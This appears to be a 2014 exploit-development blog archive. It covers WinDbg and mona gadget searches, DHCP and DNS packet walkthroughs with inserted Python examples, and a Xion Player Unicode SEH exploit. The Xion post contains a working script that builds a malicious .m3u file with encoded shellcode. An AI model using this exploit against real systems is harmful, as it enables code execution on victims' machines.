Bit of Everything! Vulnerability Research, Reverse Engineering, Malware Analysis, Exploits etc...
Wednesday, December 31, 2014
Useful windbg and mona commands for exploit writing
Find the opcodes of an instruction, say "jmp esp", by assembling it with the a command. Given no address, a assembles at the current instruction pointer and writes the bytes into the debuggee, so do this at the initial breakpoint rather than at code you intend to resume.
0:000>a //press Enter key once
Input>jmp esp //press Enter key once
7c901214 jmp esp
0:000> u 7c901214
ntdll!DbgUserBreakPoint+0x2:
7c901214 ffe4 jmp esp
So ff e4 is the opcode sequence for jmp esp (ff /4 is the indirect near jmp, and ModRM e4 selects esp).
The same idea works for multi-instruction sequences. Search process memory for the bytes of mov al,1 followed by ret:
Opcode   Instruction
b0 01    mov al,1
c3       ret
0:000> s -b 0x00000000 L?0xffffffff "b001c3"
Syntax error at '"b001c3"'
The quoted form fails because s -b takes space-separated byte values (a quoted string is only valid with s -a / s -u). L? lifts the default range-size limit so the whole address space can be scanned:
0:000> s -b 0x00000000 L?0xffffffff b0 01 c3
77eda3fa b0 01 c3 90 90 90 90 90-8b 41 14 66 8b 08 f6 c1
7c80c190 b0 01 c3 90 90 90 90 90-8b ff 55 8b ec 8b 45 0c
0:000> u 77eda3fa
RPCRT4!NDR_PIPE_HELPER32::GotoNextParam+0x1b:
77eda3fa b001 mov al,1
That search misses sequences that end in ret n (opcode c2 followed by a 16-bit operand), so search for the c2 form too:
Opcode     Instruction
b0 01      mov al,1
c2 xx xx   ret n
0:000> s -b 0x00000000 L?0xffffffff b0 01 c2
71a517a1 b0 01 c2 0c 00 90 90 90-90 90 ff 25 18 70 a8 71 ...........%.p.q
77eda6b2 b0 01 c2 08 00 90 90 90-90 90 32 c0 c3 90 90 90 ..........2.....
7c9518ea b0 01 c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56 ............U..V
0:000> u 71a517a1
mswsock+0x17a1:
71a517a1 b001 mov al,1
71a517a3 c20c00 ret 0Ch
Another useful sequence is push esp / pop ebp / ret (54 5d c2 xx xx; the hits below all end in ret 4):
0:000> s -b 0x00000000 L?0xffffffff 54 5D c2
77eedc68 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56 T]..........U..V
77eee353 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56 T]..........U..V
77eee7b3 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 51 T]..........U..Q
77eeecd6 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 6a T]..........U..j
77eeee84 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56 T]..........U..V
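The searches above, generalised into a small scanner, as an added example that is not part of the original post. It accepts both the c3 and the c2 imm16 form of ret, decodes the ret n operand, and drops hits whose address contains a bad character, which is the check you do by hand after windbg prints the list. BLOB and BASE are constructed to stand in for a module's .text section and its load address; they are not taken from any real binary.

```python
"""Opcode-sequence search over a code blob (added example, not from the post).
BLOB and BASE are constructed stand-ins for a module's .text and load address."""
import re
import struct

# A gadget may end in ret (c3) or ret n (c2 imm16); a search for "b0 01 c3"
# alone misses "b0 01 c2 0c 00", so both forms are accepted.
RET = rb"(?:\xc3|\xc2..)"
PATTERNS = {
    "jmp esp":                  rb"\xff\xe4",
    "mov al,1 / ret":           rb"\xb0\x01" + RET,
    "push esp / pop ebp / ret": rb"\x54\x5d" + RET,
}

BASE = 0x71a52000                                     # constructed load address
BLOB = (b"\x90" * 0x10 + b"\xff\xe4"                  # +0x10: jmp esp
        + b"\x90" * 6 + b"\xb0\x01\xc3"               # +0x18: mov al,1 ; ret
        + b"\x90" * 5 + b"\xb0\x01\xc2\x0c\x00"       # +0x20: mov al,1 ; ret 0Ch
        + b"\x90" * 3 + b"\x54\x5d\xc2\x04\x00")      # +0x28: push esp ; pop ebp ; ret 4


def find_gadgets(blob, base, bad_chars=b""):
    """Return (name, address, ret_n) for each hit, dropping any hit whose
    little-endian address contains a byte from bad_chars (such an address
    could not be placed in the attack buffer intact)."""
    hits = []
    for name, pat in PATTERNS.items():
        for m in re.finditer(pat, blob, re.DOTALL):   # DOTALL: '.' must match 0x0a too
            addr = base + m.start()
            if any(b in bad_chars for b in struct.pack("<I", addr)):
                continue
            raw = m.group(0)
            # ret n: c2 followed by a little-endian 16-bit operand
            ret_n = struct.unpack("<H", raw[-2:])[0] if raw[-3:-2] == b"\xc2" else 0
            hits.append((name, addr, ret_n))
    return sorted(hits, key=lambda h: h[1])


def describe(hits):
    """One line per hit, in the spirit of the windbg output above."""
    return ["%08x  %s%s" % (addr, name, (" %d" % ret_n if ret_n else ""))
            for name, addr, ret_n in hits]


if __name__ == "__main__":
    print("\n".join(describe(find_gadgets(BLOB, BASE, bad_chars=b"\x00"))))
```

To run it against a real module, read the section bytes from the file (or dump them from the debugger) and pass the module's load address as base; the bad-character filter is the same one you would apply to the result of !mona rop -cpb.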
Assorted mona commands that may be useful during exploit writing
!mona suggest
!mona assemble -s "mov eax#ret"
Find all executable locations that hold a pointer to "jmp ecx" (-p2p: pointer-to-pointer search; -x X: executable memory only)
!mona find -type instr -s "jmp ecx" -p2p -x X
Search for a push of any register, later followed by pop eax, directly followed by inc eax, ending the chain with a retn (* matches any instructions in between)
!mona findwild -s "push r32#*#pop eax#inc eax#*#retn"
!mona findwild -s "mov r16#*#retn"
ROP gadgets from all loaded DLLs (-n skips modules whose address starts with a null byte, -o ignores OS modules)
!mona rop -n -o
ROP gadgets from a specific DLL
!mona rop -m msvcr71.dll -n
ROP gadgets excluding addresses that contain bad characters
!mona rop -m msvcr71.dll -n -cpb '\x00\x0a\x0d'
Find stack pivots that land at offset 1500
!mona stackpivot -n -o -distance 1500
https://labs.snort.org/awbo/windbg.txt
http://windbg.info/doc/1-common-cmds.html
http://blog.disects.com/2014/04/windbg-useful-debugging-commands.html
Thursday, December 25, 2014
DHCP: No IP, to IP!
DHCP stands for Dynamic Host Configuration Protocol. It hands a machine that joins a network an IP address, together with the lease time, subnet mask, default gateway and DNS servers. DHCP runs over UDP: the server listens on port 67 and the client on port 68.
In this post we will see how a machine gets an IP Address.
Figure DHCP Client Communication Sequence
Source MAC   Dest MAC    Source IP   Dest IP           Packet Description
---------------------------------------------------------------------------
Client       Broadcast   0.0.0.0     255.255.255.255   DHCP Discover
DHCPsrvr     Broadcast   DHCPsrvr    255.255.255.255   DHCP Offer
Client       Broadcast   0.0.0.0     255.255.255.255   DHCP Request
DHCPsrvr     Broadcast   DHCPsrvr    255.255.255.255   DHCP ACK

Broadcast MAC address is ff:ff:ff:ff:ff:ff
Source: Microsoft (KB 169289)
The four packets below (packets 2 to 5 in the capture) are the ones that obtain an address. Let's look at each of them at packet level.
A machine that joins the network has no address yet, so it sends a DHCP Discover as a broadcast: source IP 0.0.0.0, destination IP 255.255.255.255, destination MAC ff:ff:ff:ff:ff:ff. This is the lease request; the DHCP server answers it with a DHCP Offer. A client may also include the IP address it held previously in the Discover (option 50, Requested IP Address), asking to get it back.
Figure DHCP Discover
The DHCP server picks an unassigned address from its pool and offers it to the client in the yiaddr field of the Offer, along with the lease time and other parameters as options.
Figure DHCP Offer
Figure DHCP Request
The client answers with a DHCP Request, still broadcast from 0.0.0.0, naming the address it accepts (option 50) and the server it accepts it from (option 54, Server Identifier), so that any other server that made an offer can withdraw it.
Figure DHCP ACK
The server confirms the lease with a DHCP ACK carrying the lease time and the rest of the configuration (subnet mask, router, DNS servers). Only now may the client start using the address.
In this exchange, pay particular attention to the source and destination MAC addresses. The client has no IP address until the ACK, so it broadcasts at layer 2 throughout, and in the capture shown the server's Offer and ACK are broadcast as well (a server may instead unicast them to the client's MAC when the client did not set the BROADCAST flag in the Discover).
Point to remember: in the Wireshark version used here the display filter is bootp, not dhcp (the dissector was renamed to dhcp in Wireshark 3.0; udp.port == 67 works in either).
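The Discover and Offer from the table above, built and parsed in Python as an added example that is not part of the original post. The BOOTP framing (236-byte header, magic cookie 63 82 53 63, then type-length-value options terminated by 255) and the option codes are from RFC 2131/2132; the MAC address, transaction id and IP addresses are constructed for the example.

```python
"""Build and parse DHCP (BOOTP-framed) messages: added example, not from the post.
The MAC, xid and addresses below are constructed, not from a capture."""
import socket
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"
BOOTREQUEST, BOOTREPLY = 1, 2
DISCOVER, OFFER, REQUEST, ACK = 1, 2, 3, 5          # option 53 values
MSG_NAMES = {DISCOVER: "DISCOVER", OFFER: "OFFER", REQUEST: "REQUEST", ACK: "ACK"}
HDR = "!BBBBIHHIIII16s64s128s"                      # fixed 236-byte BOOTP header

CLIENT_MAC = "00:0c:29:1a:2b:3c"                    # constructed
XID = 0x3903f326                                    # constructed transaction id


def ip2int(s):
    return struct.unpack("!I", socket.inet_aton(s))[0]


def int2ip(n):
    return socket.inet_ntoa(struct.pack("!I", n))


def build(op, xid, mac, options, ciaddr="0.0.0.0", yiaddr="0.0.0.0",
          siaddr="0.0.0.0", broadcast=True):
    """Header + magic cookie + options + END. broadcast sets flag bit 15."""
    flags = 0x8000 if broadcast else 0
    chaddr = bytes.fromhex(mac.replace(":", "")).ljust(16, b"\x00")
    hdr = struct.pack(HDR, op, 1, 6, 0, xid, 0, flags,
                      ip2int(ciaddr), ip2int(yiaddr), ip2int(siaddr), 0,
                      chaddr, b"\x00" * 64, b"\x00" * 128)
    body = b"".join(struct.pack("!BB", code, len(val)) + val for code, val in options)
    return hdr + MAGIC_COOKIE + body + b"\xff"


def parse(data):
    """Decode a DHCP message into a dict; ValueError on malformed input."""
    if len(data) < 240 or data[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message (short or bad magic cookie)")
    f = struct.unpack(HDR, data[:236])
    msg = {"op": f[0], "xid": f[4], "broadcast": bool(f[6] & 0x8000),
           "ciaddr": int2ip(f[7]), "yiaddr": int2ip(f[8]), "siaddr": int2ip(f[9]),
           "chaddr": ":".join("%02x" % b for b in f[11][:f[2]]), "options": {}}
    i = 240
    while i < len(data):
        code = data[i]
        if code == 255:                              # END
            break
        if code == 0:                                # PAD (no length byte)
            i += 1
            continue
        if i + 1 >= len(data):
            raise ValueError("truncated option header")
        length = data[i + 1]
        val = data[i + 2:i + 2 + length]
        if len(val) != length:
            raise ValueError("option %d runs past end of packet" % code)
        msg["options"][code] = val
        i += 2 + length
    opts = msg["options"]
    msg["type"] = MSG_NAMES.get(opts[53][0]) if 53 in opts else None
    if 50 in opts:
        msg["requested_ip"] = int2ip(struct.unpack("!I", opts[50])[0])
    if 51 in opts:
        msg["lease_secs"] = struct.unpack("!I", opts[51])[0]
    return msg


def client_discover():
    """Packet 2: no address yet, so ciaddr 0.0.0.0 and everything broadcast."""
    return build(BOOTREQUEST, XID, CLIENT_MAC, [
        (53, bytes([DISCOVER])),
        (50, socket.inet_aton("192.168.1.50")),      # address held previously
        (61, b"\x01" + bytes.fromhex(CLIENT_MAC.replace(":", ""))),
        (55, bytes([1, 3, 6, 15])),                  # want mask, router, DNS, domain
    ])


def server_offer(discover):
    """Packet 3: same xid, offered address in yiaddr, lease and config as options."""
    d = parse(discover)
    return build(BOOTREPLY, d["xid"], d["chaddr"], [
        (53, bytes([OFFER])),
        (54, socket.inet_aton("192.168.1.1")),       # server identifier
        (51, struct.pack("!I", 86400)),              # lease time, seconds
        (1, socket.inet_aton("255.255.255.0")),
        (3, socket.inet_aton("192.168.1.1")),
    ], yiaddr="192.168.1.100", siaddr="192.168.1.1", broadcast=d["broadcast"])
```

The Request and ACK use the same builder: the Request is a BOOTREQUEST with option 53 = 3 plus options 50 and 54, the ACK a BOOTREPLY with option 53 = 5. Note that parse rejects options that run past the end of the packet; a length byte that points beyond the buffer is the classic malformed-option case a DHCP server or client must handle.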
http://support.microsoft.com/KB/169289
Friday, December 19, 2014
Thursday, December 18, 2014
DNS A Record Query/Response
A Record Query for www.google.co.in
A Record Response for www.google.co.in
A Record Query for domain www.google.com
A Record Response for domain www.google.com
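The query and response captured above, reproduced on the wire as an added example that is not part of the original post. The encoding follows RFC 1035 (header, label-encoded question, 0xC0 compression pointers in the answer); the response and the addresses in it are constructed, not from a capture.

```python
"""Encode a DNS A query and decode an A response: added example, not from the
post. The response below is constructed and its addresses are made up."""
import struct

QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name):
    """'www.google.com' -> 03 www 06 google 03 com 00"""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_query(txid, name):
    """12-byte header + one question. flags 0x0100 = standard query, RD set."""
    hdr = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return hdr + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def decode_name(msg, off):
    """Read labels at off, following 0xC0xx compression pointers.
    Returns (name, offset just past the name as it appeared inline)."""
    labels, end, jumped, hops = [], off, False, 0
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                        # pointer: 14-bit offset
            if not jumped:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            jumped, hops = True, hops + 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if ln == 0:
            if not jumped:
                end = off
            return ".".join(labels), end
        if ln > 63:
            raise ValueError("label too long")
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln


def build_response(query, addrs, ttl=300):
    """Server side: same txid, flags 0x8180 (response, RD, RA), the question
    echoed, then one A record per address whose name is a pointer to offset 12."""
    txid = struct.unpack("!H", query[:2])[0]
    hdr = struct.pack("!HHHHHH", txid, 0x8180, 1, len(addrs), 0, 0)
    rrs = b"".join(b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
                   + bytes(int(o) for o in a.split(".")) for a in addrs)
    return hdr + query[12:] + rrs


def parse_response(msg, expect_txid):
    """Return rcode, questions and A answers. The txid check is the one a
    resolver relies on against blind spoofing; a clear QR bit means a query."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if txid != expect_txid:
        raise ValueError("transaction id mismatch")
    if not flags & 0x8000:
        raise ValueError("QR bit clear: this is a query, not a response")
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((name, qtype))
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append((name, ttl, ".".join(str(b) for b in rdata)))
    return {"rcode": flags & 0xF, "questions": questions, "answers": answers}
```

To send build_query's output for real, write it to a UDP socket on port 53 and feed the reply to parse_response with the same txid; the bytes are exactly what the captures above show after the UDP header.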
Friday, December 12, 2014
Xion Player Unicode Exploit
Unicode Exploitation Techniques
The three instructions below transfer control to the shellcode whose address we have computed in EAX: push eax, then the harmless add byte ptr [ebp],ch formed by the inserted 00 bytes around the 6d alignment byte, then retn, which pops the pushed EAX into EIP.
0012F2D0 50 PUSH EAX
0012F2D1 006D 00 ADD BYTE PTR SS:[EBP],CH
0012F2D4 C3 RETN
#!c:\python27\python.exe
# Builds the malicious .m3u. Every byte we send is expanded to "byte 00" by the
# target, so each instruction below is written with that expansion in mind.

total_buf_size = 5000

# 228 bytes to reach the SEH record
buf1 = "A" * 228

# nseh = "MM"
nseh = "\x61\x62"

# seh = "NN"; \x15\x45 becomes 15 00 45 00 = 0x00450015 (pop pop ret in Xion.exe)
seh = "\x15\x45"
print "seh: ", len(seh)

# Get a stack address into eax: eax = ebp + 0x100.
# \x6e is the alignment byte; with the inserted nulls it decodes to the harmless
# add byte ptr [esi],ch and absorbs the 00 that follows each real instruction.
prep_stack = "D"
prep_stack = prep_stack + "\x6e"          # nop/align
prep_stack = prep_stack + "\x55"          # push ebp
prep_stack = prep_stack + "\x6e"          # nop/align
prep_stack = prep_stack + "\x58"          # pop eax => ebp into eax
prep_stack = prep_stack + "\x6e"          # nop/align
prep_stack = prep_stack + "\x05\x14\x11"  # add eax,11001400
prep_stack = prep_stack + "\x6e"          # nop/align
prep_stack = prep_stack + "\x2d\x13\x11"  # sub eax,11001300
prep_stack = prep_stack + "\x6e"          # nop/align
print "prep_stack len=", len(prep_stack)

# Venetian jump: push eax / (00 6d 00 = add byte ptr [ebp],ch) / ret => eip = eax
prep_jump = "\x50"                        # push eax
prep_jump = prep_jump + "\x6d"            # nop/align
prep_jump = prep_jump + "\xc3"            # ret
print "prep_jump len=", len(prep_jump)

# offset between the last instruction 0012f3ac and
# our venetian jumpcode (c3 = ret) 0012f2d4
# to make sure shellcode is at eax
loca = "D" * 107

# alphanumeric, unicode-compatible encoded shellcode
shellcode = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERCQQ2LRCM0LJA"

remaining_buf = "D" * (total_buf_size - (len(buf1) + len(nseh) + len(seh) + len(prep_stack) + len(prep_jump) + len(loca) + len(shellcode)))
payload = buf1 + nseh + seh + prep_stack + prep_jump + loca + shellcode + remaining_buf
print "Payload length ", len(payload)

try:
    fh = open("xion_uni_m3u.m3u", "wb")   # binary mode so no byte is translated
    fh.write(payload)
    fh.close()
except IOError:
    print "Unable to create m3u file!\n"
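To check a payload like the one above before sending it, it helps to see the bytes as the CPU will after the target's Unicode expansion. The following is an added example, not code from the post or from the Corelan tutorial: it expands the prep_stack and prep_jump bytes the way the vulnerable parser does (each byte followed by 00), decodes the result with a minimal x86 decoder that knows only the opcodes this technique relies on, and simulates EAX through the sequence to confirm it ends up at EBP + 0x100 with ret landing on it. It also shows why the SEH pointer must be of the form 0x00hh00ll. The EBP value fed to the simulation is constructed, not from a real crash.

```python
"""Unicode expansion simulator for the Xion payload (added example, not from
the post). Assumes the target turns every byte into 'byte 00'; the EBP value
used below is constructed."""
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]

# The prep_stack / prep_jump bytes from the script above, before expansion.
PREP_STACK = b"D\x6e\x55\x6e\x58\x6e\x05\x14\x11\x6e\x2d\x13\x11\x6e"
PREP_JUMP = b"\x50\x6d\xc3"


def unicode_expand(payload):
    """'AB' -> 41 00 42 00: what the vulnerable parser does to our bytes."""
    return b"".join(bytes([b, 0]) for b in payload)


def decode(code):
    """Minimal x86-32 decoder for the opcodes this payload relies on; anything
    else is emitted as 'db' so nothing is silently skipped."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        # 00 /r = add byte [r/m8], r8 with mod=01 disp8 and no SIB:
        # this is what the 00 6e 00 / 00 6d 00 fillers decode to
        if op == 0x00 and i + 2 < len(code) and code[i + 1] >> 6 == 1 and code[i + 1] & 7 != 4:
            modrm, disp = code[i + 1], code[i + 2]
            out.append(("add", "byte [%s+%d],%s" % (REG32[modrm & 7], disp, REG8[(modrm >> 3) & 7])))
            i += 3
        elif op in (0x05, 0x2d) and i + 5 <= len(code):      # add/sub eax, imm32
            imm = struct.unpack("<I", code[i + 1:i + 5])[0]
            out.append(("add" if op == 0x05 else "sub", "eax,0x%08x" % imm))
            i += 5
        elif 0x40 <= op <= 0x47:
            out.append(("inc", REG32[op - 0x40])); i += 1
        elif 0x50 <= op <= 0x57:
            out.append(("push", REG32[op - 0x50])); i += 1
        elif 0x58 <= op <= 0x5f:
            out.append(("pop", REG32[op - 0x58])); i += 1
        elif op == 0xc3:
            out.append(("ret", "")); i += 1
        else:
            out.append(("db", "0x%02x" % op)); i += 1
    return out


def simulate(insns, ebp):
    """Track eax and the stack through the decoded stream; returns (eax, eip)
    where eip is what the first ret pops. The fillers' memory writes are
    ignored: they are harmless only while esi/ebp point at writable memory."""
    regs, stack, eip = {"eax": 0, "ebp": ebp}, [], None
    for mnem, ops in insns:
        if mnem == "push":
            stack.append(regs.get(ops, 0))
        elif mnem == "pop":
            regs[ops] = stack.pop()
        elif mnem in ("add", "sub") and ops.startswith("eax,"):
            imm = int(ops.split(",")[1], 16)
            regs["eax"] = (regs["eax"] + imm if mnem == "add" else regs["eax"] - imm) & 0xffffffff
        elif mnem == "ret":
            eip = stack.pop()
            break
    return regs["eax"], eip


def unicode_safe_address(addr):
    """Only 0x00hh00ll addresses can be produced by two ASCII bytes + expansion."""
    return addr & 0xff00ff00 == 0


def seh_bytes(addr):
    """The two bytes to write for a unicode-safe address (0x00450015 -> 15 45)."""
    if not unicode_safe_address(addr):
        raise ValueError("address cannot survive unicode expansion: 0x%08x" % addr)
    return bytes([addr & 0xff, (addr >> 16) & 0xff])


def pointer_after_expansion(two_bytes):
    """The little-endian dword the expanded pair becomes on the stack."""
    return struct.unpack("<I", unicode_expand(two_bytes))[0]
```

Running decode over the expanded bytes makes the alignment trick visible: every 6e filler shows up as add byte [esi+0],ch, the immediates read 0x11001400 and 0x11001300 because of the interleaved nulls, and the stream ends in push eax / add byte [ebp+0],ch / ret exactly as the disassembly above shows.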
To generate a cyclic pattern of 1500 bytes
!mona pc 1500
To find the offset into the cyclic pattern at the time of the crash (mona scans the registers, the stack and the SEH chain for pattern fragments)
!mona findmsp
To search for pop/pop/ret sequences whose address survives Unicode conversion (needed for the SEH overwrite)
!mona seh -cp unicode
seh.txt is written to the Immunity Debugger directory (C:\Program Files\Immunity Inc\Immunity Debugger). The addresses of interest are the ones tagged "unicode"; search seh.txt for that string. The hits inside Xion.exe itself are the ones to use, since the module has no ASLR, is not rebased and is not SafeSEH-compiled:
0x00450015 : pop ebx # pop ebp # ret | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004800f5 : pop ebx # pop ebp # ret | startnull,unicode {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00410079 : pop edi # pop esi # ret 0x04 | startnull,unicode,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004400c0 : pop edi # pop esi # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00470166 : pop edi # pop ebp # ret | startnull,unicode possible ansi transform(s) : 0047009A->00470161,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
This article is entirely based on Peter Van Eeckhoutte's (Corelan) tutorial on Unicode exploitation.
References
https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
http://www.fuzzysecurity.com/tutorials/expDev/5.html